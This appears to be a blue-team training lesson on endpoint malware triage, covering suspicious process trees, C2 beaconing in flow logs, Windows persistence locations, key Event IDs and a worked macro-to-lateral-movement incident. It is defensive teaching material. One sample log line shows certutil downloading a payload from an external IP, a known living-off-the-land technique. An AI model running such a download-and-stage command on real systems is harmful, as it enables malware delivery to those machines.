Malware Endpoint Analysis - Learn

Blue Team · Easy

Malware Endpoint Triage

Master the IR02 endpoint investigation workflow — reading process trees to identify malicious execution chains, recognising C2 beaconing patterns, cataloguing every persistence mechanism, correlating Windows Event IDs into a coherent attack timeline, and making the containment vs investigate decision under time pressure.

Easy Blue Team Path ⏱ 22 min read

Learning Progress

What is it?

Endpoint Malware Triage

When an EDR tool or antivirus flags a suspicious process, the SOC analyst must investigate quickly. The goal is to determine what the malware is doing, whether it has achieved persistence, what data may have been accessed, and whether other systems are affected. This is the IR02 playbook — the foundational endpoint investigation workflow every analyst must internalise before moving to more complex incident types.

⚠️Containment first: If the system is actively spreading or exfiltrating data, isolate it from the network before investigating. Evidence collection comes after containment — a live system exfiltrating data causes ongoing harm, whereas a contained system with slightly degraded forensic state is recoverable.

The Containment Decision

One of the first and most consequential decisions in endpoint malware response is whether to isolate the system immediately or investigate it live first. Both approaches have trade-offs that depend on the specific situation:

Isolate Immediately When...

Active lateral movement confirmed (Event 4624 Type 3 from this host to others). Active data exfiltration in progress (large outbound transfers). Ransomware behaviour detected (mass file encryption, shadow copy deletion). The malware family is known to propagate aggressively.

Investigate Live First When...

No active lateral movement or exfiltration confirmed. The malware appears to be beaconing but dormant. You need volatile memory state (active network connections, injected process memory) that will be lost on isolation. The system is a honeypot or lower-value asset where observing attacker behaviour is useful.

📌 Non-Technical Analogy — Process Trees

A process tree is like a corporate org chart showing who hired whom. In a legitimate company, people are hired through normal channels with expected reporting lines. When you see the CEO's Office directly spawning a maintenance worker who then spawns an anonymous contractor who reports to an external consultant — the reporting structure itself tells you something is wrong. Word processors spawn Word processes. Word processes do not spawn command shells. Command shells do not spawn PowerShell with encoded payloads. When you see those parent-child relationships in a process tree, you are reading the malware's org chart — and it reveals exactly who gave the order and in what sequence.

How it works

Endpoint Investigation Checklist

Structured Triage Order — Six Investigation Axes

Processes    Who spawned what? Unusual parent-child relationships? Masquerading names?
Network      Connections to unknown IPs? Regular beaconing intervals? DNS anomalies?
Files        Newly created or modified files in unusual paths? Dropped payloads?
Registry     New Run keys? Scheduled tasks? New services? Boot-time persistence?
Users        New accounts created? Privilege changes? Unusual logon events?
Logs         Event 4688 (process) 4624 (logon) 4625 (fail) 7045 (service) 4698 (task)

Examples

Malware Investigation in Practice

Example 01Suspicious process tree

Malware often spawns from unusual parents. Word spawning PowerShell is a classic macro-based execution red flag — this parent-child relationship should never occur in normal operation.

winword.exe (PID 4521)
  cmd.exe (PID 4892)
    powershell.exe -enc JABzAD0ATgBlAHcA... (base64-encoded payload)
      svchost32.exe (fake svchost -- legitimate svchost never has "32" suffix)
# Word macro fired cmd, ran encoded PowerShell, dropped fake svchost
# Classic macro-based malware execution chain

Example 02C2 beaconing pattern

Regular outbound connections at fixed intervals indicate Command and Control — malware phoning home on a schedule. The machine-like regularity is the distinguishing characteristic from human browsing behaviour.

14:00:03  10.0.1.55  185.220.101.45:443
14:05:03  10.0.1.55  185.220.101.45:443
14:10:03  10.0.1.55  185.220.101.45:443
14:15:03  10.0.1.55  185.220.101.45:443
# Exactly every 5 minutes = automated C2 beaconing
# 185.220.101.45 = known Tor exit node / C2 infrastructure
# Small, regular HTTPS connections at fixed intervals = jitter-free beacon

Example 03Registry persistence

Malware writes Run keys and scheduled tasks to survive reboots. Every persistence location must be checked — malware commonly establishes multiple mechanisms in case one is removed.

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
WindowsUpdate  REG_SZ  C:\Users\bob\AppData\Roaming\svchost32.exe

schtasks /query /fo LIST | findstr "Task Name"
Task Name:    MicrosoftUpdateHelper
Task To Run:  C:\ProgramData\update.exe
# Two persistence mechanisms found (Run key + scheduled task)
# Both point to files in non-standard locations for Windows updates

Example 04Key Windows Event IDs

Windows Event Logs tell the forensic story of what happened on the endpoint. These four events together reconstruct the complete compromise chain.

# Process creation (Event 4688):
Process: C:\Users\bob\AppData\Roaming\svchost32.exe
Parent:  cmd.exe

# New service (Event 7045) -- persistence via service:
Service: WindowsUpdateSvc32
Binary:  C:\ProgramData\update.exe

# Lateral movement detected (Event 4624 Type 3 from this host):
Account: Administrator  Source IP: 10.0.1.88 → 10.0.1.55
# 10.0.1.88 already has a foothold -- spreading to this endpoint

Key Concepts

What You Need to Know

🌳

Process Tree

Parent-child relationships reveal execution chains. Word spawning PowerShell, explorer spawning cmd, or Office spawning wscript are classic malware execution patterns — these relationships should never occur in normal operation.

📡

C2 Beaconing

Regular outbound connections at fixed intervals indicate Command and Control. The regularity is the giveaway — humans do not make network connections on machine-precise schedules.

🔄

Persistence

Registry Run keys, scheduled tasks, services, startup folders. Malware always establishes persistence to survive reboots — check all locations, as multiple mechanisms are common.

📊

Key Event IDs

4688 process creation, 4624/4625 logon success/fail, 7045 new service, 4698 scheduled task created. Together these tell the complete forensic story of how the endpoint was compromised.

Detection Depth

Process Masquerading and Name-Based Evasion

Malware authors know that analysts hunt suspicious process names, so they mimic legitimate Windows process names to blend into the process list. Understanding the specific masquerading patterns — and how to spot them — is one of the most practically valuable endpoint triage skills.

Numeric suffixes on system processes: svchost32.exe, lsass64.exe, explorer1.exe. Legitimate Windows system processes do not have numeric suffixes. The "32" or "64" suffix is a common attacker pattern borrowed from how legitimate programs sometimes name their 32/64-bit variants.
Wrong parent process: svchost.exe should always be a child of services.exe. If svchost is spawned by anything else — cmd.exe, PowerShell, a user-mode application — it is either injected into or masquerading as svchost. Process parent verification catches this regardless of filename.
Wrong file path: svchost.exe lives in C:\Windows\System32\. An executable named svchost.exe in C:\Users\bob\AppData\Roaming\ is malware, regardless of name. Always verify the full path, not just the filename.
Unicode homoglyph substitution: Using visually identical Unicode characters in filenames — svchost.exe where one of the characters is a Cyrillic lookalike rather than Latin. Filenames in AppData that look legitimate at a glance but don't match the System32 hash are suspicious.
LOLBAS (Living off the Land Binaries): Malware using legitimate Windows binaries like certutil.exe, bitsadmin.exe, regsvr32.exe, or mshta.exe to execute attacker code. The binary is legitimate; the parent process, command-line arguments, and network activity reveal the abuse.

Example 05LOLBAS abuse and process masquerading detection

Detecting malware that uses legitimate Windows binaries and name-based evasion — two of the most common techniques for evading signature-based detection.

--- LOLBAS: certutil used as downloader ---
Event 4688 -- Process Creation
Parent: cmd.exe  Process: certutil.exe
CommandLine: certutil -urlcache -split -f http://185.220.101.45/payload.exe C:\ProgramData\update.exe
# certutil is a legitimate Windows certificate utility
# -urlcache -split -f = download from URL (documented LOLBAS technique)
# Certutil downloading executables from external IPs = malware staging

--- Process masquerading: wrong parent for svchost ---
Event 4688 -- Process Creation
Process: C:\Windows\System32\svchost.exe (correct path)
Parent:  powershell.exe (WRONG -- svchost parent should be services.exe only)
# Parent process mismatch = injection or hollowing into svchost
# Malware created svchost from PowerShell to blend into process list
# Check memory of this svchost instance for injected code

Persistence

Persistence Mechanism Catalogue — Every Location to Check

Persistence is the ability for malware to survive a reboot. Checking every persistence location is non-negotiable in endpoint triage — a thorough eradication that misses one persistence mechanism results in re-infection the next time the system restarts. The following table covers all standard Windows persistence locations.

Mechanism	Location / Command	Detection Note
Run key (current user)	HKCU\Software\Microsoft\Windows\CurrentVersion\Run	Executes for the logged-in user on login. Common malware location — check against known-good baseline.
Run key (all users)	HKLM\Software\Microsoft\Windows\CurrentVersion\Run	Executes for all users. Requires admin to write. Higher privilege = more impactful persistence.
Scheduled task	schtasks /query /fo LIST /v	Event 4698 on creation. Check Task To Run path — malware in AppData or ProgramData is suspicious.
New service	sc query type= all state= all	Event 7045 on installation. Service binary path should be in System32 or Program Files — not AppData.
Startup folder (user)	%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup	Any file here executes on user login. Often overlooked in quick triage.
Startup folder (all users)	%PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\Startup	Requires admin rights to place files here.
WMI subscription	Get-WMIObject -Namespace root\subscription -Class __EventFilter	Fileless persistence — survives AV scans as it lives in WMI database, not on disk.
Registry RunOnce	HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce	Single execution on next boot then deletes itself. Used for staged malware deployment.

C2 Analysis

C2 Beaconing — Detection and Hunting

C2 (Command and Control) beaconing is the channel through which malware receives instructions from the attacker and exfiltrates data. Recognising beaconing patterns in network logs is a core threat hunting skill — the regularity that makes beaconing so operationally useful for attackers is also what makes it detectable.

Jitter and Evasion

Sophisticated malware adds "jitter" — randomness in the beacon interval — to make exact-interval detection harder. Instead of connecting every 300 seconds exactly, it might connect every 280–320 seconds. Detection shifts from looking for exact intervals to looking for statistical regularity in connection timing. A host that makes HTTPS connections to the same external IP between every 250–350 seconds for 12 hours is beaconing, even without exact regularity.

Other C2 evasion techniques include: domain fronting (using legitimate CDN domains like Cloudflare or Fastly to proxy C2 traffic, making the destination appear legitimate), DNS beaconing (encoding C2 communication in DNS queries to avoid HTTPS inspection), and sleeping for extended periods to reduce alert frequency.

Example 06C2 traffic analysis and lateral movement confirmation

Combining network flow analysis with endpoint process data to confirm C2 and scope lateral movement from a single compromised host.

--- C2 beacon analysis (network flow logs) ---
14:00:03  10.0.1.55 → 185.220.101.45:443  HTTPS  847 bytes outbound
14:05:03  10.0.1.55 → 185.220.101.45:443  HTTPS  847 bytes outbound
14:10:03  10.0.1.55 → 185.220.101.45:443  HTTPS  847 bytes outbound
# Identical byte count + identical interval = automated beaconing
# 847 bytes = small "check-in" packet (no large data returned = awaiting commands)

--- Lateral movement from the beaconing host (Event 4624) ---
14:32:11  Event 4624 Type 3 (Network)  NTLM auth
Source:    10.0.1.55 (compromised host)  → 10.0.1.88 (fileserver)
Account:   CORP\Administrator
# Compromised host pivoting to fileserver using stolen admin credentials
# Check 10.0.1.88 for same C2 beacon pattern -- likely already infected

--- Exfiltration detection (flow volume anomaly) ---
14:45:03  10.0.1.55 → 185.220.101.45:443  HTTPS  2.3 GB outbound in 18 minutes
# Volume spike from 847-byte beacons to 2.3 GB = data exfiltration phase
# C2 issued exfiltration command after lateral movement completed

Scoping

Building the Forensic Timeline and Scoping Lateral Movement

An endpoint triage investigation produces two critical outputs: a forensic timeline of what happened on the compromised host, and a lateral movement scope — which other systems the attacker has touched or compromised. Both are required before eradication can begin; eradicating one host while the attacker has persisted on three others accomplishes nothing.

IR ScenarioWord Macro to Domain Compromise — A Complete Endpoint IR Chain

Initial alert: EDR fires "Malicious macro execution detected" on CORP-PC-055 (Bob Chen, Finance). Analyst opens the case and begins structured triage.

Process tree: winword.exe → cmd.exe → powershell.exe -enc [base64] → svchost32.exe (AppData path). The encoded PowerShell is decoded: it downloads a second-stage payload from 185.220.101.45 using certutil, then executes it.

Persistence: Run key WindowsUpdate pointing to svchost32.exe. Scheduled task MicrosoftUpdateHelper pointing to C:\ProgramData\update.exe. Two mechanisms confirmed.

C2: Network logs show svchost32.exe connecting to 185.220.101.45:443 every 5 minutes since 09:31. First beacon 8 minutes after macro execution. Session has been active for 4 hours.

Lateral movement: Event 4624 Type 3 from CORP-PC-055 to CORP-SRV-FILE01 at 11:42, using CORP\Administrator credentials harvested by the malware from LSASS memory. CORP-SRV-FILE01 shows identical C2 beacon pattern beginning at 11:47. Second host confirmed compromised.

Containment: Both hosts isolated via EDR network quarantine. Administrator password reset forced. Scope check: no other hosts show connections to 185.220.101.45. LSASS dump check on CORP-SRV-FILE01 shows additional credentials harvested — domain-wide password audit initiated.

✅Eradication Checklist: Before clearing any compromised endpoint, confirm: (1) all persistence mechanisms identified and noted, (2) all C2 IOCs extracted and blocked at the firewall/proxy, (3) all credentials present on the system during infection are treated as compromised and rotated, (4) all other systems the malware may have pivoted to have been investigated. Rebuilding the endpoint from a clean image rather than attempting manual cleanup is the recommended approach for any confirmed malware infection — manual cleanup invariably misses something.

Reference

Core Concepts Summary

🌳

Process Tree

Word/Excel/Outlook spawning cmd/PowerShell/wscript = macro execution. cmd spawning PowerShell with -enc = encoded payload. Verify parent, full path, and command line for every suspicious process.

📡

C2 Beaconing

Fixed interval + small byte count + external IP = C2 check-in. Jitter (variable interval) requires statistical analysis. Identical byte counts across all connections = automated, not human. Volume spike = exfiltration phase.

🔄

Persistence Catalogue

Run keys (HKCU + HKLM), scheduled tasks (Event 4698), services (Event 7045), startup folders, WMI subscriptions. Check all — malware commonly installs multiple mechanisms. Verify binary paths against known-good locations.

📊

Key Event IDs

4688 process creation (with command line), 4624 Type 3 lateral movement, 4625 failed auth (spray/brute), 7045 new service, 4698 scheduled task, 4663 file access. Together these reconstruct the full attack chain.

🎭

Process Masquerading

Numeric suffixes (svchost32), wrong parent (svchost from PowerShell), wrong path (System32 process in AppData), LOLBAS (certutil as downloader, mshta/regsvr32 as loaders). Name alone is insufficient — verify path + parent + args.

🔀

Lateral Movement

Event 4624 Type 3 (network logon) from compromised host to other hosts. NTLM auth from workstation to server = suspicious. Check destination hosts for same C2 indicators. Scope before eradicating — one host is rarely the only infected system.

⚡

Containment Decision

Active spreading or exfiltration → isolate immediately. Dormant beacon → investigate live first for volatile state. Network quarantine via EDR preserves the system for investigation while stopping propagation. Always document the decision and reasoning.

🏗️

Eradication Standard

Rebuild from clean image — manual cleanup misses persistence. Rotate all credentials present during infection. Block C2 IOCs at perimeter. Scope lateral movement before declaring eradication complete. Post-incident: close the initial access vector.

Ready to put it into practice?

Proceed to the Lab

You've covered the theory. Now apply it hands-on in the simulated environment.

Start Lab — IR02 Malware Endpoint→
← Return to all labs